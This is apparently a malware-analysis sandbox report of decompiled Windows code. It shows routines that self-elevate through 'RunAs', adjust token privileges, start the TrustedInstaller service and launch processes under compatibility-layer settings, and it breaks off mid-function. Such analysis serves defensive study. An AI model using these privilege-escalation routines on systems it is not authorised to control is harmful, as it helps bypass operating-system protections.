                                                                                                                                                                                                                          				_v68.lpParameters =  &_v584;
                                                                                                                                                                                                                          				_v68.cbSize = 0x3c;
                                                                                                                                                                                                                          				_v68.lpVerb = L"RunAs";
                                                                                                                                                                                                                          				_v68.fMask = 0x40;
                                                                                                                                                                                                                          				_v68.nShow = 5;
                                                                                                                                                                                                                          				_t36 = ShellExecuteExW( &_v68); // executed
                                                                                                                                                                                                                          				_t43 = _v68.hProcess;
                                                                                                                                                                                                                          				if(_t36 == 0) {
                                                                                                                                                                                                                          					_t44 = GetLastError();
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					WaitForSingleObject(_t43, 0x5dc);
                                                                                                                                                                                                                          					_a4 = 0;
                                                                                                                                                                                                                          					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
                                                                                                                                                                                                                          					if(_t41 != 0 && _a4 != 0x103) {
                                                                                                                                                                                                                          						_t44 = _a4;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t44;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C4F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C68
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401C9B
                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                                                                                                                                          • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                                                                                                                                          • API String ID: 903100921-3385179869
                                                                                                                                                                                                                          • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                                                                          • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t16;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t18;
                                                                                                                                                                                                                          				long _t19;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t22;
                                                                                                                                                                                                                          				_Unknown_base(*)()* _t24;
                                                                                                                                                                                                                          				struct HINSTANCE__** _t35;
                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t37 = __eflags;
                                                                                                                                                                                                                          				_t35 = __eax;
                                                                                                                                                                                                                          				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                                                                                                                                                                          					return GetLastError();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t16 = E00408F72(_t35);
                                                                                                                                                                                                                          				__eflags = _t16;
                                                                                                                                                                                                                          				if(_t16 != 0) {
                                                                                                                                                                                                                          					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                                                                                                                                                                          					__eflags = _t24;
                                                                                                                                                                                                                          					if(_t24 != 0) {
                                                                                                                                                                                                                          						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                          				_v12 = 2;
                                                                                                                                                                                                                          				_a4 = _v8;
                                                                                                                                                                                                                          				_t18 = E00408F72(_t35);
                                                                                                                                                                                                                          				__eflags = _t18;
                                                                                                                                                                                                                          				if(_t18 != 0) {
                                                                                                                                                                                                                          					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                                                                                                                                                                          					__eflags = _t22;
                                                                                                                                                                                                                          					if(_t22 != 0) {
                                                                                                                                                                                                                          						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t19 = GetLastError();
                                                                                                                                                                                                                          				FindCloseChangeNotification(_v8); // executed
                                                                                                                                                                                                                          				return _t19;
                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                                                                            • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                                                                                                                                          • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                                                                                                                                          • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                                                                                                                                          • API String ID: 616250965-1253513912
                                                                                                                                                                                                                          • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                                                                          • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00401306(void* _a4) {
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				struct _SERVICE_STATUS _v32;
                                                                                                                                                                                                                          				void* _t5;
                                                                                                                                                                                                                          				int _t12;
                                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t12 = 0; // executed
                                                                                                                                                                                                                          				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                                                                                                                                                                          				_t14 = _t5;
                                                                                                                                                                                                                          				if(_t14 != 0) {
                                                                                                                                                                                                                          					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                                                                                                                                                                          						_t12 = StartServiceW(_t14, 0, 0);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					CloseServiceHandle(_t14);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				CloseServiceHandle(_a4);
                                                                                                                                                                                                                          				return _t12;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                                                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                                                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                                                                                                                          • String ID: TrustedInstaller
                                                                                                                                                                                                                          • API String ID: 862991418-565535830
                                                                                                                                                                                                                          • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                                                                          • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                                                                                                                          				struct HRSRC__* _t12;
                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                          				signed int _t18;
                                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                                          				struct HRSRC__* _t35;
                                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                                                                                                                                                          				_t35 = _t12;
                                                                                                                                                                                                                          				if(_t35 != 0) {
                                                                                                                                                                                                                          					_t33 = SizeofResource(_a4, _t35);
                                                                                                                                                                                                                          					if(_t33 > 0) {
                                                                                                                                                                                                                          						_t16 = LoadResource(_a4, _t35);
                                                                                                                                                                                                                          						if(_t16 != 0) {
                                                                                                                                                                                                                          							_t17 = LockResource(_t16);
                                                                                                                                                                                                                          							if(_t17 != 0) {
                                                                                                                                                                                                                          								_a4 = _t33;
                                                                                                                                                                                                                          								_t29 = _t33 * _t33;
                                                                                                                                                                                                                          								_t36 = 0;
                                                                                                                                                                                                                          								_t7 =  &_a4;
                                                                                                                                                                                                                          								 *_t7 = _a4 >> 2;
                                                                                                                                                                                                                          								if( *_t7 != 0) {
                                                                                                                                                                                                                          									do {
                                                                                                                                                                                                                          										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                                                                                                                                                          										_t36 = _t36 + 1;
                                                                                                                                                                                                                          										_t29 = _t26;
                                                                                                                                                                                                                          									} while (_t36 < _a4);
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                                                                                                                                                                          								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                          • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                                                                          • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                          			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                                                                                                                                                                          				WCHAR* _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                          				char* _v24;
                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                          				int _v60;
                                                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                                                          				void _v122;
                                                                                                                                                                                                                          				int _v124;
                                                                                                                                                                                                                          				short _v148;
                                                                                                                                                                                                                          				signed int _v152;
                                                                                                                                                                                                                          				intOrPtr _v168;
                                                                                                                                                                                                                          				intOrPtr _v172;
                                                                                                                                                                                                                          				intOrPtr _v176;
                                                                                                                                                                                                                          				intOrPtr _v180;
                                                                                                                                                                                                                          				void _v192;
                                                                                                                                                                                                                          				char _v196;
                                                                                                                                                                                                                          				char _v228;
                                                                                                                                                                                                                          				void _v258;
                                                                                                                                                                                                                          				int _v260;
                                                                                                                                                                                                                          				void _v786;
                                                                                                                                                                                                                          				short _v788;
                                                                                                                                                                                                                          				void _v1314;
                                                                                                                                                                                                                          				short _v1316;
                                                                                                                                                                                                                          				void _v1842;
                                                                                                                                                                                                                          				short _v1844;
                                                                                                                                                                                                                          				void _v18234;
                                                                                                                                                                                                                          				short _v18236;
                                                                                                                                                                                                                          				char _v83772;
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				short* _t174;
                                                                                                                                                                                                                          				short _t175;
                                                                                                                                                                                                                          				signed int _t176;
                                                                                                                                                                                                                          				short _t177;
                                                                                                                                                                                                                          				short _t178;
                                                                                                                                                                                                                          				int _t184;
                                                                                                                                                                                                                          				signed int _t187;
                                                                                                                                                                                                                          				intOrPtr _t207;
                                                                                                                                                                                                                          				intOrPtr _t219;
                                                                                                                                                                                                                          				int* _t252;
                                                                                                                                                                                                                          				int* _t253;
                                                                                                                                                                                                                          				int* _t266;
                                                                                                                                                                                                                          				int* _t267;
                                                                                                                                                                                                                          				wchar_t* _t270;
                                                                                                                                                                                                                          				int _t286;
                                                                                                                                                                                                                          				void* _t292;
                                                                                                                                                                                                                          				void* _t304;
                                                                                                                                                                                                                          				WCHAR* _t308;
                                                                                                                                                                                                                          				WCHAR* _t310;
                                                                                                                                                                                                                          				intOrPtr* _t311;
                                                                                                                                                                                                                          				int _t312;
                                                                                                                                                                                                                          				WCHAR* _t315;
                                                                                                                                                                                                                          				void* _t325;
                                                                                                                                                                                                                          				void* _t328;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t304 = __edx;
                                                                                                                                                                                                                          				E0040B550(0x1473c, __ecx);
                                                                                                                                                                                                                          				_t286 = 0;
                                                                                                                                                                                                                          				 *_a4 = 0;
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                          				memset( &_v192, 0, 0x40);
                                                                                                                                                                                                                          				_v60 = 0;
                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                          				_v32 = 0x100;
                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                          				_v1316 = 0;
                                                                                                                                                                                                                          				memset( &_v1314, 0, 0x208);
                                                                                                                                                                                                                          				_v788 = 0;
                                                                                                                                                                                                                          				memset( &_v786, 0, 0x208);
                                                                                                                                                                                                                          				_t315 = _a8;
                                                                                                                                                                                                                          				_t328 = _t325 + 0x24;
                                                                                                                                                                                                                          				_v83772 = 0;
                                                                                                                                                                                                                          				_v196 = 0x44;
                                                                                                                                                                                                                          				E00404923(0x104,  &_v788, _t315);
                                                                                                                                                                                                                          				if(wcschr(_t315, 0x25) != 0) {
                                                                                                                                                                                                                          					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                                                                                                                                                                          					_v8 = _t286;
                                                                                                                                                                                                                          					_v1844 = _t286;
                                                                                                                                                                                                                          					memset( &_v1842, _t286, 0x208);
                                                                                                                                                                                                                          					_t328 = _t328 + 0xc;
                                                                                                                                                                                                                          					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
                                                                                                                                                                                                                          					if(_v1844 != _t286) {
                                                                                                                                                                                                                          						E00404923(0x104,  &_v788,  &_v1844);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t308 =  &(_t315[0x2106]);
                                                                                                                                                                                                                          				if( *_t308 == _t286) {
                                                                                                                                                                                                                          					E00404B5C( &_v1316,  &_v788);
                                                                                                                                                                                                                          					__eflags = _v1316 - _t286;
                                                                                                                                                                                                                          					_t315 = _a8;
                                                                                                                                                                                                                          					_pop(_t292);
                                                                                                                                                                                                                          					if(_v1316 == _t286) {
                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_v20 = _t308;
                                                                                                                                                                                                                          					_t270 = wcschr(_t308, 0x25);
                                                                                                                                                                                                                          					_pop(_t292);
                                                                                                                                                                                                                          					if(_t270 == 0) {
                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                          						_t174 =  &(_t315[0x220e]);
                                                                                                                                                                                                                          						if( *_t174 != 1) {
                                                                                                                                                                                                                          							_v152 = _v152 | 0x00000001;
                                                                                                                                                                                                                          							_v148 =  *_t174;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t309 = ",";
                                                                                                                                                                                                                          						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                                                                                                                                                                          							_v260 = _t286;
                                                                                                                                                                                                                          							memset( &_v258, _t286, 0x3e);
                                                                                                                                                                                                                          							_v124 = _t286;
                                                                                                                                                                                                                          							memset( &_v122, _t286, 0x3e);
                                                                                                                                                                                                                          							_v8 = _t286;
                                                                                                                                                                                                                          							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                                                                                                                                                                          							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                                                                                                                                                                          							_v152 = _v152 | 0x00000004;
                                                                                                                                                                                                                          							_t266 =  &_v260;
                                                                                                                                                                                                                          							_push(_t266);
                                                                                                                                                                                                                          							L0040B1F8();
                                                                                                                                                                                                                          							_v180 = _t266;
                                                                                                                                                                                                                          							_t328 = _t328 + 0x3c;
                                                                                                                                                                                                                          							_t267 =  &_v124;
                                                                                                                                                                                                                          							L0040B1F8();
                                                                                                                                                                                                                          							_t292 = _t267;
                                                                                                                                                                                                                          							_v176 = _t267;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                                                                                                                                                                          							_v260 = _t286;
                                                                                                                                                                                                                          							memset( &_v258, _t286, 0x3e);
                                                                                                                                                                                                                          							_v124 = _t286;
                                                                                                                                                                                                                          							memset( &_v122, _t286, 0x3e);
                                                                                                                                                                                                                          							_v8 = _t286;
                                                                                                                                                                                                                          							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                                                                                                                                                                          							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                                                                                                                                                                          							_v152 = _v152 | 0x00000002;
                                                                                                                                                                                                                          							_t252 =  &_v260;
                                                                                                                                                                                                                          							_push(_t252);
                                                                                                                                                                                                                          							L0040B1F8();
                                                                                                                                                                                                                          							_v172 = _t252;
                                                                                                                                                                                                                          							_t328 = _t328 + 0x3c;
                                                                                                                                                                                                                          							_t253 =  &_v124;
                                                                                                                                                                                                                          							_push(_t253);
                                                                                                                                                                                                                          							L0040B1F8();
                                                                                                                                                                                                                          							_v168 = _t253;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t310 =  &(_t315[0x105]);
                                                                                                                                                                                                                          						if( *_t310 != _t286) {
                                                                                                                                                                                                                          							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                                                                                                                                                                          								_push(_t310);
                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                          								_v18236 = _t286;
                                                                                                                                                                                                                          								memset( &_v18234, _t286, 0x4000);
                                                                                                                                                                                                                          								_t328 = _t328 + 0xc;
                                                                                                                                                                                                                          								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                                                                                                                                                                          								_push( &_v18236);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_push( &_v788);
                                                                                                                                                                                                                          							_push(L"\"%s\" %s");
                                                                                                                                                                                                                          							_push(0x7fff);
                                                                                                                                                                                                                          							_push( &_v83772);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							_v24 =  &_v83772;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t175 = _t315[0x220c];
                                                                                                                                                                                                                          						if(_t175 != 0x20) {
                                                                                                                                                                                                                          							_v12 = _t175;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t311 = _a4;
                                                                                                                                                                                                                          						if(_t315[0x2254] == 2) {
                                                                                                                                                                                                                          							E00401D1E(_t311, L"RunAsInvoker");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t176 = _t315[0x265c];
                                                                                                                                                                                                                          						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                                                                                                                                                                          							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t177 = _t315[0x265e];
                                                                                                                                                                                                                          						if(_t177 != 1) {
                                                                                                                                                                                                                          							__eflags = _t177 - 2;
                                                                                                                                                                                                                          							if(_t177 != 2) {
                                                                                                                                                                                                                          								goto L37;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_push(L"16BITCOLOR");
                                                                                                                                                                                                                          							goto L36;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_push(L"256COLOR");
                                                                                                                                                                                                                          							L36:
                                                                                                                                                                                                                          							E00401D1E(_t311);
                                                                                                                                                                                                                          							L37:
                                                                                                                                                                                                                          							if(_t315[0x2660] == _t286) {
                                                                                                                                                                                                                          								__eflags = _t315[0x2662] - _t286;
                                                                                                                                                                                                                          								if(_t315[0x2662] == _t286) {
                                                                                                                                                                                                                          									__eflags = _t315[0x2664] - _t286;
                                                                                                                                                                                                                          									if(_t315[0x2664] == _t286) {
                                                                                                                                                                                                                          										__eflags = _t315[0x2666] - _t286;
                                                                                                                                                                                                                          										if(_t315[0x2666] == _t286) {
                                                                                                                                                                                                                          											L46:
                                                                                                                                                                                                                          											_t178 = _t315[0x2a6e];
                                                                                                                                                                                                                          											_t358 = _t178 - 3;
                                                                                                                                                                                                                          											if(_t178 != 3) {
                                                                                                                                                                                                                          												__eflags = _t178 - 2;
                                                                                                                                                                                                                          												if(_t178 != 2) {
                                                                                                                                                                                                                          													__eflags =  *_t311 - _t286;
                                                                                                                                                                                                                          													if( *_t311 == _t286) {
                                                                                                                                                                                                                          														_push(_t286);
                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                          														_push(_t311);
                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                          													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                                                                                                                                                                          													L63:
                                                                                                                                                                                                                          													_t293 = _t311;
                                                                                                                                                                                                                          													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                                                                                                                                                                          													_t312 = _t184;
                                                                                                                                                                                                                          													if(_t312 == _t286 && _v60 != _t286) {
                                                                                                                                                                                                                          														_t363 = _t315[0x266c] - _t286;
                                                                                                                                                                                                                          														if(_t315[0x266c] != _t286) {
                                                                                                                                                                                                                          															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                                                                                                                                                                          															_a4 = _a4 | 0xffffffff;
                                                                                                                                                                                                                          															_a8 = _t286;
                                                                                                                                                                                                                          															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                                                                                                                                                                          															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                          													E004055D1(_t184,  &_v44);
                                                                                                                                                                                                                          													return _t312;
                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                          												E00405497( &_v92);
                                                                                                                                                                                                                          												E00405497( &_v228);
                                                                                                                                                                                                                          												E0040149F(__eflags,  &_v92);
                                                                                                                                                                                                                          												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                                                                                                                                                                          												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                                                                                                                                                                          												_t204 = _a4;
                                                                                                                                                                                                                          												__eflags =  *_a4;
